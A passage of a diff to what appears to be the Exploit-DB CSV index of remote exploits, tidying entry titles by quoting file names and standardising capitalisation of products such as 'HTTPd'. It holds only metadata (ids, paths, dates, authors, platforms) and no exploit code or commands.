Retrieval",1999-09-25,anonymous,multiple,remote,0 20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 - lists Command Execution",1994-06-06,"Razvan Dragomirescu",linux,remote,0 20599,platforms/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT - Remote Command Execution",1994-02-24,CIAC,unix,remote,0 20600,platforms/windows/remote/20600.c,"SmartMax MailMax 1.0 - SMTP Buffer Overflow",1999-02-13,_mcp_,windows,remote,0 @@ -12456,7 +12458,7 @@ id,file,description,date,author,platform,type,port 20686,platforms/cgi/remote/20686.txt,"Free Online Dictionary of Computing 1.0 - Remote File Viewing",2001-03-09,Cgisecurity,cgi,remote,0 20687,platforms/windows/remote/20687.txt,"OReilly Software WebSite Professional 2.5.4 - Path Disclosure",2001-03-16,"Roberto Moreno",windows,remote,0 20688,platforms/windows/remote/20688.txt,"Qualcomm Eudora 5.0.2 - 'Use Microsoft Viewer' Code Execution",2001-03-18,http-equiv,windows,remote,0 -20689,platforms/cgi/remote/20689.pl,"SWSoft ASPSeek 1.0 - s.cgi Buffer Overflow",2001-03-19,teleh0r,cgi,remote,0 +20689,platforms/cgi/remote/20689.pl,"SWSoft ASPSeek 1.0 - 's.cgi' Buffer Overflow",2001-03-19,teleh0r,cgi,remote,0 20690,platforms/linux/remote/20690.sh,"WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion",2001-03-15,"Frank DENIS",linux,remote,0 20692,platforms/multiple/remote/20692.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing (1)",2001-06-13,rfp,multiple,remote,0 20693,platforms/multiple/remote/20693.c,"Apache 1.3 - Artificially Long Slash Path Directory Listing (2)",2002-02-21,st0ic,multiple,remote,0 @@ -12513,9 +12515,9 @@ id,file,description,date,author,platform,type,port 20825,platforms/windows/remote/20825.txt,"Michael Lamont Savant HTTP Server 2.1 - Directory Traversal",2001-02-17,"Tom Tom",windows,remote,0 20826,platforms/windows/remote/20826.txt,"Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal",2001-05-07,neme-dhc,windows,remote,0 20829,platforms/windows/remote/20829.txt,"T. Hauck Jana Server 1.45/1.46 - Hex Encoded Directory Traversal",2001-05-07,neme-dhc,windows,remote,0 -20831,platforms/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 - a1disp2.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 -20832,platforms/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 - a1disp3.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 -20833,platforms/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 - a1disp4.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 +20831,platforms/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 - 'a1disp2.cgi' Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 +20832,platforms/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 - 'a1disp3.cgi' Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 +20833,platforms/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 - 'a1disp4.cgi' Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 20835,platforms/windows/remote/20835.c,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (1)",2001-05-15,"Filip Maertens",windows,remote,0 20836,platforms/windows/remote/20836.c,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (2)",2001-05-16,HuXfLuX,windows,remote,0 20837,platforms/windows/remote/20837.pl,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (3)",2001-05-15,"Cyrus The Gerat",windows,remote,0 @@ -12565,7 +12567,7 @@ id,file,description,date,author,platform,type,port 20936,platforms/linux/remote/20936.c,"NetSQL 1.0 - Remote Buffer Overflow",2001-06-15,"Sergio Monteiro",linux,remote,0 20938,platforms/cgi/remote/20938.txt,"DC Scripts DCShop Beta 1.0 02 - File Disclosure (1)",2001-06-18,"Peter Helms",cgi,remote,0 20939,platforms/cgi/remote/20939.txt,"DC Scripts DCShop Beta 1.0 02 - File Disclosure (2)",2001-06-18,"Peter Helms",cgi,remote,0 -20940,platforms/cgi/remote/20940.txt,"Tarantella Enterprise 3 3.x - TTAWebTop.cgi Arbitrary File Viewing",2001-06-18,kf,cgi,remote,0 +20940,platforms/cgi/remote/20940.txt,"Tarantella Enterprise 3 3.x - 'TTAWebTop.cgi' Arbitrary File Viewing",2001-06-18,kf,cgi,remote,0 20941,platforms/freebsd/remote/20941.pl,"W3M 0.1/0.2 - Malformed MIME Header Buffer Overflow",2001-06-19,White_E,freebsd,remote,0 20947,platforms/windows/remote/20947.txt,"1C: Arcadia Internet Store 1.0 - Arbitrary File Disclosure",2001-06-21,ViperSV,windows,remote,0 20948,platforms/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 - Path Disclosure",2001-06-21,ViperSV,windows,remote,0 @@ -12608,8 +12610,8 @@ id,file,description,date,author,platform,type,port 21036,platforms/windows/remote/21036.pl,"Ipswitch WS_FTP Server 2.0 - Anonymous Multiple FTP Command Buffer Overflows",2001-07-25,andreas,windows,remote,0 21037,platforms/linux/remote/21037.c,"GNU groff 1.1x - xploitation Via LPD",2001-06-23,zen-parse,linux,remote,0 21039,platforms/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 - Hex Encoded URL Directory Traversal",2001-07-26,THRAN,windows,remote,0 -21049,platforms/linux/remote/21049.c,"NCSA httpd 1.x - Buffer Overflow (1)",1997-04-23,savage,linux,remote,0 -21050,platforms/linux/remote/21050.c,"NCSA httpd 1.x - Buffer Overflow (2)",1995-02-17,Xtremist,linux,remote,0 +21049,platforms/linux/remote/21049.c,"NCSA HTTPd 1.x - Buffer Overflow (1)",1997-04-23,savage,linux,remote,0 +21050,platforms/linux/remote/21050.c,"NCSA HTTPd 1.x - Buffer Overflow (2)",1995-02-17,Xtremist,linux,remote,0 21057,platforms/windows/remote/21057.txt,"Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure",2001-08-08,"Marek Roy",windows,remote,0 21064,platforms/unix/remote/21064.c,"Fetchmail 5.x - POP3 Reply Signed Integer Index",2001-08-09,"Salvatore Sanfilippo -antirez-",unix,remote,0 21066,platforms/unix/remote/21066.c,"Fetchmail 5.x - IMAP Reply Signed Integer Index",2001-08-09,"Sanfillipo antirez",unix,remote,0 @@ -12709,7 +12711,7 @@ id,file,description,date,author,platform,type,port 21303,platforms/windows/remote/21303.txt,"Working Resources BadBlue 1.5/1.6 - Directory Traversal",2002-02-26,"Strumpf Noir Society",windows,remote,0 21309,platforms/linux/remote/21309.c,"xtell 1.91.1/2.6.1 - Multiple Remote Buffer Overflow Vulnerabilities",2002-02-27,spybreak,linux,remote,0 21310,platforms/linux/remote/21310.txt,"xtell 2.6.1 - User Status Remote Information Disclosure",2002-02-27,spybreak,linux,remote,0 -21311,platforms/windows/remote/21311.txt,"BPM Studio Pro 4.2 - HTTPD Directory Traversal",2002-02-27,UNTER,windows,remote,0 +21311,platforms/windows/remote/21311.txt,"BPM Studio Pro 4.2 - HTTPd Directory Traversal",2002-02-27,UNTER,windows,remote,0 21313,platforms/windows/remote/21313.txt,"Microsoft IIS 4.0/5.0/5.1 - Authentication Method Disclosure",2002-03-05,"David Litchfield",windows,remote,0 21314,platforms/unix/remote/21314.txt,"OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off-by-One",2002-03-07,Morgan,unix,remote,0 21334,platforms/php/remote/21334.pl,"Cobalt RaQ 2.0/3.0/4.0 XTR - 'MultiFileUpload.php' Authentication Bypass (1)",2002-03-08,"Wouter ter Maat",php,remote,0 @@ -12944,8 +12946,8 @@ id,file,description,date,author,platform,type,port 22000,platforms/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 - Admin Interface Cross-Site Scripting",2002-11-08,euronymous,cgi,remote,0 22001,platforms/windows/remote/22001.txt,"Simple Web Server 0.5.1 - File Disclosure",2002-11-08,"Tamer Sahin",windows,remote,0 22007,platforms/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",windows,remote,0 -22012,platforms/linux/remote/22012.c,"Light HTTPD 0.1 - GET Buffer Overflow (1)",2002-11-12,Xpl017Elz,linux,remote,0 -22013,platforms/linux/remote/22013.c,"Light HTTPD 0.1 - GET Buffer Overflow (2)",2002-11-12,uid0x00,linux,remote,0 +22012,platforms/linux/remote/22012.c,"Light HTTPd 0.1 - GET Buffer Overflow (1)",2002-11-12,Xpl017Elz,linux,remote,0 +22013,platforms/linux/remote/22013.c,"Light HTTPd 0.1 - GET Buffer Overflow (2)",2002-11-12,uid0x00,linux,remote,0 22016,platforms/linux/remote/22016.c,"LibHTTPD 1.2 - POST Buffer Overflow",2002-11-13,Xpl017Elz,linux,remote,0 22018,platforms/windows/remote/22018.pl,"Key Focus KF Web Server 1.0.8 - Directory Traversal",2002-11-13,mattmurphy,windows,remote,0 22020,platforms/multiple/remote/22020.pl,"Perception LiteServe 2.0 - CGI Source Disclosure",2002-11-14,mattmurphy,multiple,remote,0 @@ -12962,9 +12964,9 @@ id,file,description,date,author,platform,type,port 22034,platforms/linux/remote/22034.pl,"WSMP3 0.0.1/0.0.2 - Remote Heap Corruption (1)",2002-11-25,"Damian Myerscough",linux,remote,0 22035,platforms/linux/remote/22035.c,"WSMP3 0.0.1/0.0.2 - Remote Heap Corruption (2)",2002-11-25,Xpl017Elz,linux,remote,0 22036,platforms/unix/remote/22036.pl,"XFree86 X11R6 3.3.x - Font Server Remote Buffer Overrun",2002-11-25,"TESO Security",unix,remote,0 -22046,platforms/linux/remote/22046.c,"Null HTTPD 0.5 - Remote Heap Corruption",2002-11-26,eSDee,linux,remote,0 +22046,platforms/linux/remote/22046.c,"Null HTTPd 0.5 - Remote Heap Corruption",2002-11-26,eSDee,linux,remote,0 22049,platforms/unix/remote/22049.c,"Lib CGI 0.1 - Include Buffer Overflow",2002-11-27,Xpl017Elz,unix,remote,0 -22054,platforms/cgi/remote/22054.c,"Boozt Standard 0.9.8 - index.cgi Buffer Overrun",2002-11-29,BrainStorm,cgi,remote,0 +22054,platforms/cgi/remote/22054.c,"Boozt Standard 0.9.8 - 'index.cgi' Buffer Overrun",2002-11-29,BrainStorm,cgi,remote,0 22057,platforms/linux/remote/22057.pl,"Pserv 2.0 - User-Agent HTTP Header Buffer Overflow (1)",2002-11-30,Sapient2003,linux,remote,0 22058,platforms/linux/remote/22058.c,"Pserv 2.0 - User-Agent HTTP Header Buffer Overflow (2)",2002-11-30,jsk,linux,remote,0 22063,platforms/linux/remote/22063.c,"Zeroo HTTP Server 1.5 - Directory Traversal (1)",2002-11-22,mikecc,linux,remote,0 @@ -13022,7 +13024,7 @@ id,file,description,date,author,platform,type,port 22270,platforms/windows/remote/22270.txt,"Sage 1.0 Beta 3 - Content Management System Cross-Site Scripting",2003-02-20,euronymous,windows,remote,0 22271,platforms/hardware/remote/22271.c,"Cisco IOS 11/12 - OSPF Neighbor Buffer Overflow",2003-02-20,FX,hardware,remote,0 22274,platforms/linux/remote/22274.c,"Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (2)",2003-02-23,CrZ,linux,remote,0 -22275,platforms/linux/remote/22275.pl,"Webmin 0.9x / Usermin 0.9x/1.0 - Session ID Spoofing Unauthenticated Access",2003-02-20,"Carl Livitt",linux,remote,0 +22275,platforms/linux/remote/22275.pl,"Webmin 0.9x / Usermin 0.9x/1.0 - Unauthenticated Access Session ID Spoofing",2003-02-20,"Carl Livitt",linux,remote,0 22278,platforms/linux/remote/22278.pl,"moxftp 2.2 - Banner Parsing Buffer Overflow",2003-02-24,"Knud Erik Hojgaard",linux,remote,0 22280,platforms/windows/remote/22280.txt,"Microsoft Outlook2000/Express 6.0 - Arbitrary Program Execution",2003-02-24,http-equiv,windows,remote,0 22288,platforms/windows/remote/22288.txt,"Microsoft Internet Explorer 5/6 - Self Executing HTML File",2003-02-25,http-equiv,windows,remote,0 @@ -13034,7 +13036,7 @@ id,file,description,date,author,platform,type,port 22304,platforms/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - SQL Injection (Metasploit)",2012-10-28,Metasploit,multiple,remote,0 22305,platforms/windows/remote/22305.rb,"HP Operations Agent - Opcode 'coda.exe' 0x8c Buffer Overflow (Metasploit)",2012-10-29,Metasploit,windows,remote,0 22306,platforms/windows/remote/22306.rb,"HP Operations Agent - Opcode 'coda.exe' 0x34 Buffer Overflow (Metasploit)",2012-10-29,Metasploit,windows,remote,0 -22311,platforms/cgi/remote/22311.txt,"Axis Communications Video Server 2.x - Command.cgi File Creation",2003-02-28,"Martin Eiszner",cgi,remote,0 +22311,platforms/cgi/remote/22311.txt,"Axis Communications Video Server 2.x - 'Command.cgi' File Creation",2003-02-28,"Martin Eiszner",cgi,remote,0 22312,platforms/cgi/remote/22312.txt,"Apple QuickTime/Darwin Streaming Server 4.1.x - 'parse_xml.cgi' File Disclosure",2003-02-28,"Joe Testa",cgi,remote,0 22313,platforms/unix/remote/22313.c,"Sendmail 8.12.x - Header Processing Buffer Overflow (1)",2003-03-02,"Last Stage of Delirium",unix,remote,0 22314,platforms/unix/remote/22314.c,"Sendmail 8.12.x - Header Processing Buffer Overflow (2)",2003-03-02,bysin,unix,remote,0 @@ -13045,7 +13047,7 @@ id,file,description,date,author,platform,type,port 22342,platforms/linux/remote/22342.c,"Qpopper 4.0.x - Remote Memory Corruption",2003-03-10,"Florian Heinz",linux,remote,0 22346,platforms/linux/remote/22346.c,"PGP4Pine 1.75.6/1.76 - 'Message Line' Buffer Overflow",2003-03-12,"Eric AUGE",linux,remote,0 22350,platforms/hardware/remote/22350.txt,"Nokia SGSN DX200 - Remote SNMP Information Disclosure",2003-03-13,"Ollie Whitehouse",hardware,remote,0 -22351,platforms/windows/remote/22351.py,"Freefloat FTP Server - 'PUT' Command Buffer Overflow",2012-10-30,"Jacob Holcomb",windows,remote,0 +22351,platforms/windows/remote/22351.py,"Freefloat FTP Server - 'PUT' Buffer Overflow",2012-10-30,"Jacob Holcomb",windows,remote,0 22353,platforms/linux/remote/22353.c,"BitchX 1.0 - Remote 'Send_CTCP()' Memory Corruption",2003-03-06,eSDee,linux,remote,0 22355,platforms/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 - 'texis.exe' Information Disclosure",2003-03-14,sir.mordred@hushmail.com,cgi,remote,0 22356,platforms/unix/remote/22356.c,"Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow",2003-03-15,flatline,unix,remote,0 @@ -13150,8 +13152,8 @@ id,file,description,date,author,platform,type,port 22737,platforms/windows/remote/22737.txt,"Novell NetIQ Privileged User Manager 2.3.1 - 'auth.dll' pa_modify_accounts() Remote Code Execution",2012-11-15,rgod,windows,remote,0 22738,platforms/windows/remote/22738.txt,"Novell NetIQ Privileged User Manager 2.3.1 - 'ldapagnt.dll' ldapagnt_eval() Perl Code Evaluation Remote Code Execution",2012-11-15,rgod,windows,remote,0 22751,platforms/multiple/remote/22751.txt,"Mozilla 1.x / opera 6/7 - Timed document.write Method Cross Domain Policy",2003-06-07,meme-boi,multiple,remote,0 -22753,platforms/cgi/remote/22753.pl,"MNOGoSearch 3.1.20 - search.cgi UL Buffer Overflow (1)",2003-06-10,pokleyzz,cgi,remote,0 -22754,platforms/cgi/remote/22754.pl,"MNOGoSearch 3.1.20 - search.cgi UL Buffer Overflow (2)",2003-06-10,inv,cgi,remote,0 +22753,platforms/cgi/remote/22753.pl,"MNOGoSearch 3.1.20 - 'search.cgi?UL' Buffer Overflow (1)",2003-06-10,pokleyzz,cgi,remote,0 +22754,platforms/cgi/remote/22754.pl,"MNOGoSearch 3.1.20 - 'search.cgi?UL' Buffer Overflow (2)",2003-06-10,inv,cgi,remote,0 22755,platforms/multiple/remote/22755.txt,"Aiglon Web Server 2.0 - Installation Path Information Disclosure",2003-06-10,"Ziv Kamir",multiple,remote,0 22758,platforms/windows/remote/22758.txt,"silentthought simple Web server 1.0 - Directory Traversal",2003-06-12,"Ziv Kamir",windows,remote,0 22769,platforms/windows/remote/22769.txt,"Methodus 3 Web Server - File Disclosure",2003-06-13,"Peter Winter-Smith",windows,remote,0 @@ -13226,8 +13228,8 @@ id,file,description,date,author,platform,type,port 23074,platforms/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0 23079,platforms/windows/remote/23079.txt,"freeFTPd 1.2.6 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0 23080,platforms/windows/remote/23080.txt,"freeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0 -23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Unauthenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0 -23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0 +23081,platforms/multiple/remote/23081.pl,"MySQL - Unauthenticated Remote User Enumeration",2012-12-02,kingcope,multiple,remote,0 +23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Remote Authentication Bypass",2012-12-02,kingcope,linux,remote,0 23083,platforms/windows/remote/23083.txt,"MySQL - 'Stuxnet Technique' Windows Remote System Exploit",2012-12-02,kingcope,windows,remote,0 23091,platforms/windows/remote/23091.txt,"FloosieTek FTGatePro 1.22 - Mail Server Full Path Disclosure",2003-09-02,"Ziv Kamir",windows,remote,0 23092,platforms/windows/remote/23092.txt,"FloosieTek FTGatePro 1.22 - Mail Server Cross-Site Scripting",2003-09-02,"Ziv Kamir",windows,remote,0 @@ -13283,7 +13285,7 @@ id,file,description,date,author,platform,type,port 23227,platforms/unix/remote/23227.rb,"Nagios XI Network Monitor Graph Explorer Component - Command Injection (Metasploit)",2012-12-09,Metasploit,unix,remote,0 23229,platforms/windows/remote/23229.cpp,"Microsoft Windows XP/2000/2003 - Message Queuing Service Heap Overflow",2003-10-07,DaveK,windows,remote,0 23230,platforms/multiple/remote/23230.txt,"Adobe SVG Viewer 3.0 - 'postURL'/'getURL' Restriction Bypass",2003-10-07,"GreyMagic Software",multiple,remote,0 -23243,platforms/windows/remote/23243.py,"Freefloat FTP Server - 'USER' Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0 +23243,platforms/windows/remote/23243.py,"Freefloat FTP Server - 'USER' Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0 23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 - Messenger Service Buffer Overrun (MS03-043)",2003-10-25,Adik,windows,remote,0 23404,platforms/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass (1)",2003-11-28,"Bugtraq Security",multiple,remote,0 23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0 @@ -13382,7 +13384,7 @@ id,file,description,date,author,platform,type,port 23560,platforms/windows/remote/23560.txt,"anteco visual technologies ownserver 1.0 - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 23562,platforms/windows/remote/23562.html,"2WIRE HomePortal Series - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 23563,platforms/multiple/remote/23563.txt,"Darkwet Network WebcamXP 1.6.945 - Cross-Site Scripting",2004-01-21,"Rafel Ivgi The-Insider",multiple,remote,0 -23564,platforms/multiple/remote/23564.txt,"Mephistoles HTTPD 0.6 - Cross-Site Scripting",2004-01-21,"Donato Ferrante",multiple,remote,0 +23564,platforms/multiple/remote/23564.txt,"Mephistoles HTTPd 0.6 - Cross-Site Scripting",2004-01-21,"Donato Ferrante",multiple,remote,0 23878,platforms/windows/remote/23878.txt,"HP Web Jetadmin 7.5.2456 - Printer Firmware Update Script Arbitrary File Upload",2004-03-24,wirepair,windows,remote,0 23877,platforms/windows/remote/23877.txt,"NexGen FTP Server 1.0/2.x - Directory Traversal",2004-03-24,"Ziv Kamir",windows,remote,0 23579,platforms/unix/remote/23579.rb,"TWiki MAKETEXT - Remote Command Execution (Metasploit)",2012-12-23,Metasploit,unix,remote,0 @@ -13478,7 +13480,7 @@ id,file,description,date,author,platform,type,port 23926,platforms/windows/remote/23926.txt,"Mcafee FreeScan CoMcFreeScan Browser - Information Disclosure",2004-04-07,"S G Masood",windows,remote,0 23936,platforms/linux/remote/23936.pl,"lcdproc lcdd 0.x/4.x - Multiple Vulnerabilities",2004-04-08,wsxz,linux,remote,0 33402,platforms/linux/remote/33402.txt,"Ruby on Rails 2.3.5 - 'protect_from_forgery' Cross-Site Request Forgery",2009-12-14,p0deje,linux,remote,0 -23987,platforms/cgi/remote/23987.txt,"SurgeLDAP 1.0 - User.cgi Directory Traversal",2004-04-12,dr_insane,cgi,remote,0 +23987,platforms/cgi/remote/23987.txt,"SurgeLDAP 1.0 - 'User.cgi' Directory Traversal",2004-04-12,dr_insane,cgi,remote,0 24012,platforms/windows/remote/24012.html,"WinSCP 3.5.6 - Long URI Handling Memory Corruption",2004-04-16,"Luca Ercoli",windows,remote,0 24017,platforms/windows/remote/24017.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)",2013-01-10,sickness,windows,remote,0 24018,platforms/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload (Metasploit)",2013-01-10,Metasploit,php,remote,0 @@ -13502,7 +13504,7 @@ id,file,description,date,author,platform,type,port 24076,platforms/windows/remote/24076.txt,"Sambar Server 5.x - Open Proxy / Authentication Bypass",2003-01-30,"David Endler",windows,remote,0 24077,platforms/windows/remote/24077.txt,"Business Objects Crystal Reports 9/10 Web Form Viewer - Directory Traversal",2004-05-03,"Imperva Application Defense Center",windows,remote,0 24079,platforms/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String",2004-05-03,"Nilanjan De",linux,remote,0 -24084,platforms/multiple/remote/24084.py,"Nagios3 - history.cgi Remote Command Execution",2013-01-13,blasty,multiple,remote,0 +24084,platforms/multiple/remote/24084.py,"Nagios3 - 'history.cgi' Remote Command Execution",2013-01-13,blasty,multiple,remote,0 24093,platforms/linux/remote/24093.c,"Exim Sender 3.35 - Verification Remote Stack Buffer Overrun",2004-05-06,newroot,linux,remote,0 24097,platforms/windows/remote/24097.c,"MyWeb HTTP Server 3.3 - GET Buffer Overflow",2004-05-06,badpack3t,windows,remote,0 24098,platforms/windows/remote/24098.txt,"Qualcomm Eudora 6.x - Embedded Hyperlink URI Obfuscation",2004-05-08,"Brett Glass",windows,remote,0 @@ -13527,12 +13529,12 @@ id,file,description,date,author,platform,type,port 24149,platforms/php/remote/24149.php,"PHP 4/5 - Input/Output Wrapper Remote File Inclusion Function Command Execution",2004-05-27,Slythers,php,remote,0 24187,platforms/windows/remote/24187.txt,"Microsoft Internet Explorer 6 - ADODB.Stream Object File Installation",2003-08-23,Jelmer,windows,remote,0 24189,platforms/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,multiple,remote,0 -24159,platforms/linux/remote/24159.rb,"Nagios3 - history.cgi Host Command Execution (Metasploit)",2013-01-16,Metasploit,linux,remote,0 +24159,platforms/linux/remote/24159.rb,"Nagios3 - 'history.cgi' Host Command Execution (Metasploit)",2013-01-16,Metasploit,linux,remote,0 24160,platforms/linux/remote/24160.txt,"SquirrelMail 1.x - Email Header HTML Injection",2004-05-31,"Roman Medina",linux,remote,0 24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - 'show.asp?show' Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - 'showperf.asp?title' Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0 -24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0 +24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Unauthenticated Remote Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0 24174,platforms/windows/remote/24174.txt,"Microsoft Internet Explorer 6 - URL Local Resource Access",2004-06-06,"Rafel Ivgi The-Insider",windows,remote,0 24179,platforms/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure",2004-06-08,"Vickenty Fesunov",linux,remote,0 24196,platforms/windows/remote/24196.txt,"Mozilla Browser 1.6/1.7 - URI Obfuscation",2004-06-14,http-equiv,windows,remote,0 @@ -13581,7 +13583,7 @@ id,file,description,date,author,platform,type,port 24339,platforms/linux/remote/24339.c,"Citadel/UX 5.9/6.x - 'Username' Buffer Overflow (2)",2004-07-30,Nebunu,linux,remote,0 24342,platforms/cgi/remote/24342.txt,"Webcam Corp Webcam Watchdog 4.0.1 - 'sresult.exe' Cross-Site Scripting",2004-08-02,dr_insane,cgi,remote,0 24345,platforms/windows/remote/24345.txt,"IBM Tivoli Directory Server 3.2.2/4.1 - LDACGI Directory Traversal",2004-08-02,anonymous,windows,remote,0 -24350,platforms/windows/remote/24350.txt,"acme thttpd 2.0.7 - Directory Traversal",2004-08-04,CoolICE,windows,remote,0 +24350,platforms/windows/remote/24350.txt,"Acme thttpd 2.0.7 - Directory Traversal",2004-08-04,CoolICE,windows,remote,0 24353,platforms/unix/remote/24353.sql,"Oracle 9i - Multiple Unspecified Vulnerabilities",2004-08-04,"Marco Ivaldi",unix,remote,0 24354,platforms/windows/remote/24354.txt,"Microsoft Internet Explorer 6 - mms Protocol Handler Executable Command Line Injection",2004-08-05,"Nicolas Robillard",windows,remote,0 24361,platforms/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (2)",2004-08-09,jsk,linux,remote,0 @@ -13602,7 +13604,7 @@ id,file,description,date,author,platform,type,port 24455,platforms/unix/remote/24455.rb,"Portable UPnP SDK - 'unique_service_name()' Remote Code Execution (Metasploit)",2013-02-05,Metasploit,unix,remote,0 24461,platforms/windows/remote/24461.rb,"VMware OVF Tools - Format String (Metasploit) (2)",2013-02-12,Metasploit,windows,remote,0 24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit (Metasploit)",2013-02-07,"Craig Freyman",windows,remote,0 -24479,platforms/windows/remote/24479.py,"Freefloat FTP Server 1.0 - 'Raw' Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0 +24479,platforms/windows/remote/24479.py,"Freefloat FTP Server 1.0 - 'Raw' Buffer Overflow",2013-02-11,superkojiman,windows,remote,0 24490,platforms/windows/remote/24490.rb,"Novell Groupwise Client - 'gwcls1.dll' ActiveX Remote Code Execution (Metasploit)",2013-02-12,Metasploit,windows,remote,0 24494,platforms/hardware/remote/24494.rb,"Polycom HDX - Telnet Authentication Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23 24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)",2013-02-14,"Scott Bell",windows,remote,0 @@ -13689,16 +13691,16 @@ id,file,description,date,author,platform,type,port 24904,platforms/windows/remote/24904.rb,"Java CMM - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,windows,remote,0 24905,platforms/multiple/remote/24905.rb,"v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,multiple,remote,0 24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0 -24931,platforms/hardware/remote/24931.rb,"NETGEAR DGN1000B - setup.cgi Remote Command Execution (Metasploit)",2013-04-08,Metasploit,hardware,remote,0 +24931,platforms/hardware/remote/24931.rb,"NETGEAR DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)",2013-04-08,Metasploit,hardware,remote,0 24935,platforms/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0 -24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 - apply.cgi Remote Command Injection (Metasploit)",2013-04-08,Metasploit,hardware,remote,0 +24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 - 'apply.cgi' Remote Command Injection (Metasploit)",2013-04-08,Metasploit,hardware,remote,0 24937,platforms/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0 24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10 SP3/11 SP2 - Remote Execution (Metasploit)",2013-04-08,Metasploit,multiple,remote,0 24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption Buffer Overflow",2013-04-12,Wireghoul,windows,remote,0 643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)",2004-12-21,"Haroon Rashid Astwat",windows,remote,110 646,platforms/windows/remote/646.c,"Seattle Lab Mail 